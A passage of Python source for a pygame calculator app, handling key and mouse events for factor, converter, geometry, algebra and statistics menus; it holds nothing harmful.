elif len(self.input_box_1_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_1
or event.unicode == '.' and '.' in self.input_box_1):
None
else:
self.input_box_1 += event.unicode
self.input_box_1_mod = self.input_box_1
if '-' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('-', '')
if '.' in self.input_box_1_mod:
self.input_box_1_mod = self.input_box_1_mod.replace('.', '')
if self.active_menu == 'extrapolate_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif len(self.input_box_3_mod) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-' and '-' in self.input_box_3
or event.unicode == '.' and '.' in self.input_box_3):
None
else:
self.input_box_3 += event.unicode
self.input_box_3_mod = self.input_box_3
if '-' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('-', '')
if '.' in self.input_box_3_mod:
self.input_box_3_mod = self.input_box_3_mod.replace('.', '')
elif self.active_menu == 'extrapolate_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 8:
None
elif self.event_check_letter(event):
self.input_box_5 += event.unicode
elif self.active_menu == 'extrapolate_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if event.unicode == '-' or event.unicode == '.':
None
else:
self.input_box_7 += event.unicode
# Average menu.
elif (self.active_menu == 'average_input_1'
or self.active_menu == 'average_input_2'
or self.active_menu == 'average_input_3'
or self.active_menu == 'average_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.average_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'average_menu'
self.active_button = ''
if self.active_menu == 'average_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'average_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'average_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'average_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Median menu.
elif (self.active_menu == 'median_input_1'
or self.active_menu == 'median_input_2'
or self.active_menu == 'median_input_3'
or self.active_menu == 'median_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.median_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'median_menu'
self.active_button = ''
if self.active_menu == 'median_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'median_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'median_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'median_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Mode menu.
elif (self.active_menu == 'mode_input_1'
or self.active_menu == 'mode_input_2'
or self.active_menu == 'mode_input_3'
or self.active_menu == 'mode_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.mode_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'mode_menu'
self.active_button = ''
if self.active_menu == 'mode_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'mode_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'mode_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'mode_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
# Range menu.
elif (self.active_menu == 'range_input_1'
or self.active_menu == 'range_input_2'
or self.active_menu == 'range_input_3'
or self.active_menu == 'range_input_4'):
if event.key == pygame.K_RETURN:
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.range_(value_list))
self.answer_text_x_mod = 0
self.active_menu = 'range_menu'
self.active_button = ''
if self.active_menu == 'range_input_1':
if event.key == pygame.K_BACKSPACE:
self.input_box_1 = self.input_box_1[:-1]
elif len(self.input_box_1) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_1 += event.unicode
elif self.active_menu == 'range_input_2':
if event.key == pygame.K_BACKSPACE:
self.input_box_3 = self.input_box_3[:-1]
elif len(self.input_box_3) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_3 += event.unicode
elif self.active_menu == 'range_input_3':
if event.key == pygame.K_BACKSPACE:
self.input_box_5 = self.input_box_5[:-1]
elif len(self.input_box_5) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_5 += event.unicode
elif self.active_menu == 'range_input_4':
if event.key == pygame.K_BACKSPACE:
self.input_box_7 = self.input_box_7[:-1]
elif len(self.input_box_7) >= 7:
None
elif self.event_check_number(event):
if (event.unicode == '-'
or event.unicode == '.'):
None
else:
self.input_box_7 += event.unicode
def manage_keyup(self, event):
"""Manage pygame KEYUP events."""
None
def manage_mousebuttondown(self, event):
"""Manage pygame MOUSEBUTTONDOWN events."""
mouse_pos = pygame.mouse.get_pos()
if self.active_menu == 'main_menu':
if self.converters_button.button.collidepoint(mouse_pos):
self.active_button = 'converters_button'
elif self.factors_button.button.collidepoint(mouse_pos):
self.active_button = 'factors_button'
elif self.geometry_button.button.collidepoint(mouse_pos):
self.active_button = 'geometry_button'
elif self.algebra_button.button.collidepoint(mouse_pos):
self.active_button = 'algebra_button'
elif self.data_processing_button.button.collidepoint(mouse_pos):
self.active_button = 'data_processing_button'
elif (self.active_menu != 'main_menu'
and self.active_menu != 'factors_menu'
and self.active_menu != 'converters_menu'
and self.active_menu != 'geometry_menu'
and self.active_menu != 'algebra_menu'
and self.active_menu != 'data_processing_menu'):
if self.answer_button.button.collidepoint(mouse_pos):
if event.button == 4:
self.answer_text_x_mod -= self.answer_text_move_amount
elif event.button == 5:
self.answer_text_x_mod += self.answer_text_move_amount
self.converters_menu_mousebuttondown(event, mouse_pos)
self.factors_menu_mousebuttondown(event, mouse_pos)
self.geometry_menu_mousebuttondown(event, mouse_pos)
self.algebra_menu_mousebuttondown(event, mouse_pos)
self.data_processing_menu_mousebuttondown(event, mouse_pos)
def manage_mousebuttonup(self, event):
"""Manage pygame MOUSEBUTTONUP events."""
mouse_pos = pygame.mouse.get_pos()
if self.active_menu == 'main_menu':
if self.converters_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'converters_menu'
elif self.factors_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'factors_menu'
elif self.geometry_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'geometry_menu'
elif self.algebra_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'algebra_menu'
elif self.data_processing_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'data_processing_menu'
else:
self.active_button = ''
self.factors_menu_mousebuttonup(event, mouse_pos)
self.converters_menu_mousebuttonup(event, mouse_pos)
self.geometry_menu_mousebuttonup(event, mouse_pos)
self.algebra_menu_mousebuttonup(event, mouse_pos)
self.data_processing_menu_mousebuttonup(event, mouse_pos)
def factors_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the factors menu."""
# Main factors menu.
if self.active_menu == 'factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.get_factors_button.button.collidepoint(mouse_pos):
self.active_button = 'get_factors_button'
elif self.common_factors_button.button.collidepoint(mouse_pos):
self.active_button = 'common_factors_button'
elif self.gcf_button.button.collidepoint(mouse_pos):
self.active_button = 'gcf_button'
elif self.lcf_button.button.collidepoint(mouse_pos):
self.active_button = 'lcf_button'
# Get factors menu.
elif self.active_menu == 'get_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_4.button.collidepoint(mouse_pos):
self.active_button = 'input_button_4'
self.active_menu = 'get_factors_input_1'
# Get factors input menu
elif self.active_menu == 'get_factors_input_1':
self.active_menu = 'get_factors_menu'
self.active_button = ''
# Common factors menu.
elif self.active_menu == 'common_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'common_factors_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'common_factors_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'common_factors_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'common_factors_input_4'
# Common factors input menus
elif self.active_menu == 'common_factors_input_1':
self.active_menu = 'common_factors_menu'
self.active_button = ''
elif self.active_menu == 'common_factors_input_2':
self.active_menu = 'common_factors_menu'
self.active_button = ''
elif self.active_menu == 'common_factors_input_3':
self.active_menu = 'common_factors_menu'
self.active_button = ''
elif self.active_menu == 'common_factors_input_4':
self.active_menu = 'common_factors_menu'
self.active_button = ''
#GCF menu.
elif self.active_menu == 'gcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'gcf_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'gcf_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'gcf_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'gcf_input_4'
# Greatest common factors input menus
elif self.active_menu == 'gcf_input_1':
self.active_menu = 'gcf_menu'
self.active_button = ''
elif self.active_menu == 'gcf_input_2':
self.active_menu = 'gcf_menu'
self.active_button = ''
elif self.active_menu == 'gcf_input_3':
self.active_menu = 'gcf_menu'
self.active_button = ''
elif self.active_menu == 'gcf_input_4':
self.active_menu = 'gcf_menu'
self.active_button = ''
# LCF menu.
elif self.active_menu == 'lcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'lcf_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'lcf_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'lcf_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'lcf_input_4'
# Least common factors input menus
elif self.active_menu == 'lcf_input_1':
self.active_menu = 'lcf_menu'
self.active_button = ''
elif self.active_menu == 'lcf_input_2':
self.active_menu = 'lcf_menu'
self.active_button = ''
elif self.active_menu == 'lcf_input_3':
self.active_menu = 'lcf_menu'
self.active_button = ''
elif self.active_menu == 'lcf_input_4':
self.active_menu = 'lcf_menu'
self.active_button = ''
def factors_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the factors menu."""
# Main factors menu.
if self.active_menu == 'factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.get_factors_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'get_factors_menu'
self.input_buttons = 1
elif self.common_factors_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'common_factors_menu'
self.input_buttons = 4
elif self.gcf_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'gcf_menu'
self.input_buttons = 4
elif self.lcf_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'lcf_menu'
self.input_buttons = 4
else:
self.active_button = ''
# Get factors menu.
elif self.active_menu == 'get_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = str(MATH.get_factors_(self.input_value_4))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Common factors menu.
elif self.active_menu == 'common_factors_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.common_factors_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# GCF menu.
elif self.active_menu == 'gcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.gcf_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# LCF menu.
elif self.active_menu == 'lcf_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('factors_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
value_list = []
if self.input_box_1 != '':
self.input_value_1 = int(self.input_box_1)
value_list.append(self.input_value_1)
if self.input_box_3 != '':
self.input_value_3 = int(self.input_box_3)
value_list.append(self.input_value_3)
if self.input_box_5 != '':
self.input_value_5 = int(self.input_box_5)
value_list.append(self.input_value_5)
if self.input_box_7 != '':
self.input_value_7 = int(self.input_box_7)
value_list.append(self.input_value_7)
if value_list != []:
self.answer = str(MATH.lcf_(value_list))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
def converters_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the converters menu."""
# Main converters menu.
if self.active_menu == 'converters_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.temp_button.button.collidepoint(mouse_pos):
self.active_button = 'temp_button'
# Temperature convert menu.
elif self.active_menu == 'temp_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_2.button.collidepoint(mouse_pos):
self.active_button = 'input_button_2'
self.active_menu = 'temp_input_1'
elif self.input_button_4.button.collidepoint(mouse_pos):
self.active_button = 'input_button_4'
self.active_menu = 'temp_input_2'
elif self.input_button_6.button.collidepoint(mouse_pos):
self.active_button = 'input_button_6'
self.active_menu = 'temp_input_3'
# Temperature input menus.
elif self.active_menu == 'temp_input_1':
self.active_menu = 'temp_menu'
self.active_button = ''
elif self.active_menu == 'temp_input_2':
self.active_menu = 'temp_menu'
self.active_button = ''
elif self.active_menu == 'temp_input_3':
self.active_menu = 'temp_menu'
self.active_button = ''
def converters_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the converters menu."""
# Main converters menu.
if self.active_menu == 'converters_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.temp_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'temp_menu'
self.input_buttons = 3
else:
self.active_button = ''
# Temperature convert menu.
elif self.active_menu == 'temp_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('converters_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if (self.input_box_2 == ''
or self.input_box_4 == ''
or self.input_box_6 == ''):
None
else:
self.input_value_2 = float(self.input_box_2)
self.input_value_4 = self.input_box_4.upper()
self.input_value_6 = self.input_box_6.upper()
self.answer = str(MATH.temperature_convert_(self.input_value_2, self.input_value_4, self.input_value_6))
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
def geometry_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the geometry menu."""
# Main geometry menu.
if self.active_menu == 'geometry_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.mar_button.button.collidepoint(mouse_pos):
self.active_button = 'mar_button'
elif self.solid_polygon_button.button.collidepoint(mouse_pos):
self.active_button = 'solid_polygon_button'
# Maintain ratio menu.
elif self.active_menu == 'mar_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'mar_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'mar_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'mar_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'mar_input_4'
# Maintain ratio input menus.
elif self.active_menu == 'mar_input_1':
self.active_menu = 'mar_menu'
self.active_button = ''
elif self.active_menu == 'mar_input_2':
self.active_menu = 'mar_menu'
self.active_button = ''
elif self.active_menu == 'mar_input_3':
self.active_menu = 'mar_menu'
self.active_button = ''
elif self.active_menu == 'mar_input_4':
self.active_menu = 'mar_menu'
self.active_button = ''
# Solid polygon menu.
elif self.active_menu == 'solid_polygon_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_4.button.collidepoint(mouse_pos):
self.active_button = 'input_button_4'
self.active_menu = 'solid_polygon_input_1'
# Solid polygon input menu.
elif self.active_menu == 'solid_polygon_input_1':
self.active_menu = 'solid_polygon_menu'
self.active_button = ''
def geometry_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the geometry menu."""
# Main geometry menu.
if self.active_menu == 'geometry_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.mar_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'mar_menu'
self.input_buttons = 4
elif self.solid_polygon_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'solid_polygon_menu'
self.input_buttons = 1
else:
self.active_button = ''
# Maintain ratio menu.
elif self.active_menu == 'mar_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('geometry_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_7 == ''):
None
else:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.input_value_7 = float(self.input_box_7)
source_surf = [self.input_value_1, self.input_value_3]
dest_surf = [self.input_value_5, self.input_value_7]
try:
self.answer = str(MATH.maintain_aspect_ratio_(
source_surf, dest_surf))
except ZeroDivisionError:
pass
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
# Solid polygon menu.
elif self.active_menu == 'solid_polygon_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('geometry_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if self.input_box_4 != '':
self.input_value_4 = int(self.input_box_4)
self.answer = MATH.solid_polygon_info_(self.input_value_4)
self.answer = f'Edges = {self.answer["edges"]}, Vertices = {self.answer["vertices"]}, Faces = {self.answer["faces"]}, Triangles = {self.answer["triangles"]}'
self.answer_text_x_mod = 0
self.active_button = ''
else:
self.active_button = ''
def algebra_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the algebra menu."""
# Main algebra menu.
if self.active_menu == 'algebra_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.root_button.button.collidepoint(mouse_pos):
self.active_button = 'root_button'
elif self.extrapolate_button.button.collidepoint(mouse_pos):
self.active_button = 'extrapolate_button'
# Root menu.
elif self.active_menu == 'root_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'root_input_1'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'root_input_2'
# Root input menus.
elif self.active_menu == 'root_input_1':
self.active_menu = 'root_menu'
self.active_button = ''
elif self.active_menu == 'root_input_2':
self.active_menu = 'root_menu'
self.active_button = ''
# Extrapolate menu.
elif self.active_menu == 'extrapolate_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'extrapolate_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'extrapolate_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'extrapolate_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'extrapolate_input_4'
# Extrapolate input menus.
elif self.active_menu == 'extrapolate_input_1':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
elif self.active_menu == 'extrapolate_input_2':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
elif self.active_menu == 'extrapolate_input_3':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
elif self.active_menu == 'extrapolate_input_4':
self.active_menu = 'extrapolate_menu'
self.active_button = ''
def algebra_menu_mousebuttonup(self, event, mouse_pos):
"""Manage the MOUSEBUTTONUP events for the algebra menu."""
# Main algebra menu.
if self.active_menu == 'algebra_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'main_menu'
elif self.root_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'root_menu'
self.input_buttons = 2
elif self.extrapolate_button.button.collidepoint(mouse_pos):
self.active_button = ''
self.active_menu = 'extrapolate_menu'
self.input_buttons = 4
else:
self.active_button = ''
# Root menu.
elif self.active_menu == 'root_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('algebra_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
if self.input_box_3 == '' or self.input_box_5 == '':
None
else:
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = float(self.input_box_5)
self.answer = str(MATH.root_(self.input_value_3, self.input_value_5))
self.answer_text_x_mod = 0
self.active_button = ''
# Extrapolate menu.
elif self.active_menu == 'extrapolate_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.reset_variables('algebra_menu')
elif self.calculate_button.button.collidepoint(mouse_pos):
check = ['add', 'subtract', 'multiply', 'divide', 'exponent', 'root']
if (self.input_box_1 == ''
or self.input_box_3 == ''
or self.input_box_5 == ''
or self.input_box_5.lower() not in check
or self.input_box_7 == ''):
None
else:
try:
self.input_value_1 = int(self.input_box_1)
self.input_value_3 = int(self.input_box_3)
except ValueError:
self.input_value_1 = float(self.input_box_1)
self.input_value_3 = float(self.input_box_3)
self.input_value_5 = self.input_box_5.lower()
self.input_value_7 = int(self.input_box_7)
self.answer = str(MATH.extrapolate_(self.input_value_1, self.input_value_3, self.input_value_5, self.input_value_7))
self.answer_text_x_mod = 0
self.active_button = ''
def data_processing_menu_mousebuttondown(self, event, mouse_pos):
"""Manage the MOUSEBUTTONDOWN events for the data processing menu."""
# Main data processing menu.
if self.active_menu == 'data_processing_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.average_button.button.collidepoint(mouse_pos):
self.active_button ='average_button'
elif self.median_button.button.collidepoint(mouse_pos):
self.active_button ='median_button'
elif self.mode_button.button.collidepoint(mouse_pos):
self.active_button ='mode_button'
elif self.range_button.button.collidepoint(mouse_pos):
self.active_button ='range_button'
# Average menu.
elif self.active_menu == 'average_menu':
if self.back_button.button.collidepoint(mouse_pos):
self.active_button = 'back_button'
elif self.calculate_button.button.collidepoint(mouse_pos):
self.active_button = 'calculate_button'
elif self.input_button_1.button.collidepoint(mouse_pos):
self.active_button = 'input_button_1'
self.active_menu = 'average_input_1'
elif self.input_button_3.button.collidepoint(mouse_pos):
self.active_button = 'input_button_3'
self.active_menu = 'average_input_2'
elif self.input_button_5.button.collidepoint(mouse_pos):
self.active_button = 'input_button_5'
self.active_menu = 'average_input_3'
elif self.input_button_7.button.collidepoint(mouse_pos):
self.active_button = 'input_button_7'
self.active_menu = 'average_input_4'
# Average input menus.
elif (self.active_menu == 'average_input_1'
or self.active_menu == 'average_input_2'
or self.active_menu == 'average_input_3'
